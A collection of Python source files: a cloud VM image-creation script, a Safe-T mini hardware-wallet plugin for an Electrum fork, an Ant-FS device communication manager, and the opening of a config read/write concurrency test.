def create_instance(instance_name, params):
is_windows = "windows" in instance_name
setup_script = preprocess_setup_script(params["setup_script"], is_windows)
try:
if is_windows:
startup_script = "windows-startup-script-ps1=" + setup_script
else:
startup_script = "startup-script=" + setup_script
if "source_image" in params:
image = {"image": params["source_image"]}
else:
image = {
"image-project": params["source_image_project"],
"image-family": params["source_image_family"],
}
gcloud.create_instance(
instance_name,
project=params["project"],
zone=params["zone"],
machine_type="n1-standard-8",
network=params.get("network", "buildkite"),
metadata_from_file=startup_script,
boot_disk_type="pd-ssd",
boot_disk_size="50GB",
**image,
)
finally:
os.remove(setup_script)
# https://stackoverflow.com/a/25802742
def write_to_clipboard(output):
process = subprocess.Popen("pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE)
process.communicate(output.encode("utf-8"))
def print_windows_instructions(project, zone, instance_name):
tail_start = gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, until="Finished running startup scripts"
)
pw = json.loads(
gcloud.reset_windows_password(
instance_name, format="json", project=project, zone=zone
).stdout
)
rdp_file = tempfile.mkstemp(suffix=".rdp")[1]
with open(rdp_file, "w") as f:
f.write("full address:s:" + pw["ip_address"] + "\n")
f.write("username:s:" + pw["username"] + "\n")
subprocess.run(["open", rdp_file])
write_to_clipboard(pw["password"])
with gcloud.PRINT_LOCK:
print("Use this password to connect to the Windows VM: " + pw["password"])
print("Please run the setup script C:\\setup.ps1 once you're logged in.")
# Wait until the VM reboots once, then open RDP again.
tail_start = gcloud_utils.tail_serial_console(
instance_name,
project=project,
zone=zone,
start=tail_start,
until="Finished running startup scripts",
)
print("Connecting via RDP a second time to finish the setup...")
write_to_clipboard(pw["password"])
run(["open", rdp_file])
return tail_start
def workflow(name, params):
instance_name = "%s-image-%s" % (name, int(datetime.now().timestamp()))
project = params["project"]
zone = params["zone"]
try:
# Create the VM.
create_instance(instance_name, params)
# Wait for the VM to become ready.
gcloud_utils.wait_for_instance(instance_name, project=project, zone=zone, status="RUNNING")
if "windows" in instance_name:
# Wait for VM to be ready, then print setup instructions.
tail_start = print_windows_instructions(project, zone, instance_name)
# Continue printing the serial console until the VM shuts down.
gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, start=tail_start
)
else:
# Continuously print the serial console.
gcloud_utils.tail_serial_console(instance_name, project=project, zone=zone)
# Wait for the VM to completely shutdown.
gcloud_utils.wait_for_instance(
instance_name, project=project, zone=zone, status="TERMINATED"
)
# Create a new image from our VM.
gcloud.create_image(
instance_name,
project=project,
family=name,
source_disk=instance_name,
source_disk_zone=zone,
licenses=params.get("licenses", []),
)
finally:
gcloud.delete_instance(instance_name, project=project, zone=zone)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
workflow(**item)
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
print("Usage: create_images.py {}".format(" ".join(IMAGE_CREATION_VMS.keys())))
return 1
unknown_args = set(argv).difference(IMAGE_CREATION_VMS.keys())
if unknown_args:
print(
"Unknown platforms: {}\nAvailable platforms: {}".format(
", ".join(unknown_args), ", ".join(IMAGE_CREATION_VMS.keys())
)
)
return 1
if subprocess.check_output(["git", "status", "--porcelain"], universal_newlines=True).strip():
print(
"There are pending changes in your Git repository. You have to commit "
"them, before create_images.py can continue.",
file=sys.stderr,
)
return 1
# Put VM creation instructions into the work queue.
for name in argv:
WORK_QUEUE.put({"name": name, "params": IMAGE_CREATION_VMS[name]})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "CPUchain"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
manager.py
|
# Ant-FS
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import array
import datetime
import logging
import threading
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
from ant.easy.channel import Channel
from ant.easy.node import Node, Message
import ant.fs.command
from ant.fs.beacon import Beacon
from ant.fs.command import (LinkCommand, DownloadRequest, DownloadResponse,
AuthenticateCommand, AuthenticateResponse, DisconnectCommand,
UploadRequest, UploadResponse, UploadDataCommand, UploadDataResponse,
EraseRequestCommand, EraseResponse)
from ant.fs.commandpipe import CreateFile, Response, Time, TimeResponse
from ant.fs.file import Directory
from ant.fs.commons import crc
_logger = logging.getLogger("ant.fs.manager")
class AntFSException(Exception):
def __init__(self, error, errno=None):
Exception.__init__(self, error, errno)
self._error = error
self._errno = errno
def get_error(self):
if self._errno is not None:
return str(self._errno) + ": " + self._error
else:
return self._error
class AntFSDownloadException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSUploadException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSEraseException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSAuthenticationException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSCreateFileException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSTimeException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class Application:
_serial_number = 1337
_frequency = 19 # 0 to 124, x - 2400 (in MHz)
def __init__(self):
self._queue = queue.Queue()
self._beacons = queue.Queue()
self._node = Node()
try:
NETWORK_KEY = [0xa8, 0xa4, 0x23, 0xb9, 0xf5, 0x5e, 0x63, 0xc1]
self._node.set_network_key(0x00, NETWORK_KEY)
print("Request basic information...")
m = self._node.request_message(Message.ID.RESPONSE_CAPABILITIES)
print(" Capabilities: ", m[2])
# m = self._node.request_message(Message.ID.RESPONSE_ANT_VERSION)
# print " ANT version: ", struct.unpack("<10sx", m[2])[0]
#m = self._node.request_message(Message.ID.RESPONSE_SERIAL_NUMBER)
#print " Serial number:", struct.unpack("<I", m[2])[0]
print("Starting system...")
#NETWORK_KEY= [0xa8, 0xa4, 0x23, 0xb9, 0xf5, 0x5e, 0x63, 0xc1]
#self._node.set_network_key(0x00, NETWORK_KEY)
print("Key done...")
self._channel = self._node.new_channel(Channel.Type.BIDIRECTIONAL_RECEIVE)
self._channel.on_broadcast_data = self._on_data
self._channel.on_burst_data = self._on_data
self.setup_channel(self._channel)
self._worker_thread = threading.Thread(target=self._worker, name="ant.fs")
self._worker_thread.start()
except Exception as e:
self.stop()
raise e
def _worker(self):
self._node.start()
def _main(self):
try:
_logger.debug("Link level")
beacon = self._get_beacon()
if self.on_link(beacon):
for i in range(0, 5):
beacon = self._get_beacon()
if beacon.get_client_device_state() == Beacon.ClientDeviceState.AUTHENTICATION:
_logger.debug("Auth layer")
if self.on_authentication(beacon):
_logger.debug("Authenticated")
beacon = self._get_beacon()
self.on_transport(beacon)
self.disconnect()
break
finally:
_logger.debug("Run 5")
self.stop()
def _on_beacon(self, data):
b = Beacon.parse(data)
self._beacons.put(b)
def _on_command(self, data):
c = ant.fs.command.parse(data)
self._queue.put(c)
def _on_data(self, data):
# print "_on_data", data, len(data)
if data[0] == 0x43:
self._on_beacon(data[:8])
if len(data[8:]) > 0:
self._on_command(data[8:])
elif data[0] == 0x44:
self._on_command(data)
def _get_beacon(self):
b = self._beacons.get()
self._beacons.task_done()
return b
def _get_command(self, timeout=15.0):
_logger.debug("Get command, t%d, s%d", timeout, self._queue.qsize())
c = self._queue.get(True, timeout)
self._queue.task_done()
return c
def _send_command(self, c):
data = c.get()
if len(data) == 8:
self._channel.send_acknowledged_data(data)
else:
self._channel.send_burst_transfer(data)
# Application actions are defined from here
# =======================================================================
# These should be overloaded:
def setup_channel(self, channel):
pass
def on_link(self, beacon):
pass
def on_authentication(self, beacon):
pass
def on_transport(self, beacon):
pass
# Shouldn't have to touch these:
def start(self):
self._main()
def stop(self):
self._node.stop()
def _send_commandpipe(self, data):
# print "send commandpipe", data
self.upload(0xfffe, data)
def _get_commandpipe(self):
# print "get commandpipe"
return ant.fs.commandpipe.parse(self.download(0xfffe))
def create(self, typ, data, callback=None):
# print "create", typ
request = CreateFile(len(data), 0x80, [typ, 0x00, 0x00], [0x00, 0xff, 0xff])
self._send_commandpipe(request.get())
result = self._get_commandpipe()
# result._debug()
if result.get_response() != Response.Response.OK:
raise AntFSCreateFileException("Could not create file",
result.get_response())
# print "create result", result, result.get_index(), result.get_data_type(), result.get_identifier()
# d = self.download_directory()
# Inform the application that the upload request was successfully created
if callback is not None:
callback(0)
self.upload(result.get_index(), data, callback)
return result.get_index()
def upload(self, index, data, callback=None):
# print "upload", index, len(data)
iteration = 0
while True:
# Request Upload
# Continue using Last Data Offset (special MAX_ULONG value)
request_offset = 0 if iteration == 0 else 0xffffffff
self._send_command(UploadRequest(index, len(data), request_offset))
upload_response = self._get_command()
# upload_response._debug()
if upload_response._get_argument("response") != UploadResponse.Response.OK:
raise AntFSUploadException("Upload request failed",
upload_response._get_argument("response"))
# Upload data
offset = upload_response._get_argument("last_data_offset")
max_block = upload_response._get_argument("maximum_block_size")
# print " uploading", offset, "to", offset + max_block
data_packet = data[offset:offset + max_block]
crc_seed = upload_response._get_argument("crc")
crc_val = crc(data_packet, upload_response._get_argument("crc"))
# Pad with 0 to even 8 bytes
missing_bytes = 8 - (len(data_packet) % 8)
if missing_bytes != 8:
data_packet.extend(array.array('B', [0] * missing_bytes))
# print " adding", str(missing_bytes), "padding"
# print " packet", len(data_packet)
# print " crc ", crc_val, "from seed", crc_seed
self._send_command(UploadDataCommand(crc_seed, offset, data_packet, crc_val))
upload_data_response = self._get_command()
# upload_data_response._debug()
if upload_data_response._get_argument("response") != UploadDataResponse.Response.OK:
raise AntFSUploadException("Upload data failed",
upload_data_response._get_argument("response"))
if callback is not None and len(data) != 0:
callback((offset + len(data_packet)) / len(data))
if offset + len(data_packet) >= len(data):
# print " done"
break
# print " one more"
iteration += 1
def download(self, index, callback=None):
offset = 0
initial = True
crc = 0
data = array.array('B')
while True:
_logger.debug("Download %d, o%d, c%d", index, offset, crc)
self._send_command(DownloadRequest(index, offset, True, crc))
_logger.debug("Wait for response...")
try:
response = self._get_command()
if response._get_argument("response") == DownloadResponse.Response.OK:
remaining = response._get_argument("remaining")
offset = response._get_argument("offset")
total = offset + remaining
data[offset:total] = response._get_argument("data")[:remaining]
# print "rem", remaining, "offset", offset, "total", total, "size", response._get_argument("size")
# TODO: check CRC
if callback is not None and response._get_argument("size") != 0:
callback(total / response._get_argument("size"))
if total == response._get_argument("size"):
return data
crc = response._get_argument("crc")
offset = total
else:
raise AntFSDownloadException("Download request failed: ",
response._get_argument("response"))
except queue.Empty:
_logger.debug("Download %d timeout", index)
# print "recover from download failure"
def download_directory(self, callback=None):
data = self.download(0, callback)
return Directory.parse(data)
def set_time(self, time=datetime.datetime.utcnow()):
"""
:param time: datetime in UTC, or None to set to current time
"""
utc_tai_diff_seconds = 35
offset = time - datetime.datetime(1989, 12, 31, 0, 0, 0)
t = Time(int(offset.total_seconds()) + utc_tai_diff_seconds, 0xffffffff, 0)
self._send_commandpipe(t.get())
result = self._get_commandpipe()
if result.get_response() != TimeResponse.Response.OK:
raise AntFSTimeException("Failed to set time", result.get_response())
def erase(self, index):
self._send_command(EraseRequestCommand(index))
response = self._get_command()
if response._get_argument("response") != EraseResponse.Response.ERASE_SUCCESSFUL:
raise AntFSDownloadException("Erase request failed: ",
response._get_argument("response"))
def link(self):
self._channel.request_message(Message.ID.RESPONSE_CHANNEL_ID)
self._send_command(LinkCommand(self._frequency, 4, self._serial_number))
# New period, search timeout
self._channel.set_period(4096)
self._channel.set_search_timeout(10)
self._channel.set_rf_freq(self._frequency)
def authentication_serial(self):
self._send_command(AuthenticateCommand(
AuthenticateCommand.Request.SERIAL,
self._serial_number))
response = self._get_command()
return (response.get_serial(), response.get_data_string())
def authentication_passkey(self, passkey):
self._send_command(AuthenticateCommand(
AuthenticateCommand.Request.PASSKEY_EXCHANGE,
self._serial_number, passkey))
response = self._get_command()
if response._get_argument("type") == AuthenticateResponse.Response.ACCEPT:
return response.get_data_array()
else:
raise AntFSAuthenticationException("Passkey authentication failed",
response._get_argument("type"))
def authentication_pair(self, friendly_name):
data = array.array('B', map(ord, list(friendly_name)))
self._send_command(AuthenticateCommand(
AuthenticateCommand.Request.PAIRING,
self._serial_number, data))
response = self._get_command(30)
if response._get_argument("type") == AuthenticateResponse.Response.ACCEPT:
return response.get_data_array()
else:
raise AntFSAuthenticationException("Pair authentication failed",
response._get_argument("type"))
def disconnect(self):
d = DisconnectCommand(DisconnectCommand.Type.RETURN_LINK, 0, 0)
self._send_command(d)
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from silicoin.util.config import create_default_silicoin_config, initial_config_file, load_config, save_config
from silicoin.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aide in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin-off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins-off threads to perform read/write tasks
